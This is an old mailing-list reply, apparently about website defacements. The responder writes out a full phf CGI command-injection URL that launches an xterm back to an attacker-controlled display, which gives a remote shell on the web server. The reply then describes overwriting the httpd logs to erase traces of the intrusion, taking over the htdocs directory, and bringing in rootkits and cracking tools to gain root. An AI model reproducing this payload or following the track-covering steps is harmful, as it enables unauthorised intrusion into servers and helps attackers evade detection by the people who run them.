Sebastian Stache wrote:
>I'm getting unnerved by the fact that not only
>have those sites indeed been hacked, but noone
>seems to be surpised.
>
>What techniques were used? To alter the html
>files, someone obviously managed to achieve
>file overwrite rights (at the very least).
You'd be surprised at how many NCSA httpd sites are
still out there which are vulnerable to the attack:
netscape 'http://www.victim.com/cgi-bin/phf?Qalias=x%0a/usr/bin/X11/xterm%20-display%20mydisplay.attacker.com:0'
Once you have an interactive shell (as an open window on your display)
running at the userid the http server (httpd daemon) is running under
you can usually then overwrite the httpd logs in the logfile directory
to erase any trace of your intrusion. Then you will often find that
the htdocs subdirectory is either owned by you or that it has fairly
liberal permissions.
And of course, once you are logged in on a machine you can bring over
all of the hacker toolkits to automate breaking 'root' -- COPS, crack,
"rootkit" (various exploit scripts), etc. Given enough time I'd give
most intruders who have managed to login via telnet a pretty good
chance ( > 50% ) of breaking maximum security on most Unix systems (ie.
gain 'root' privileges).
- Morrow
Follow-Ups:
|
|
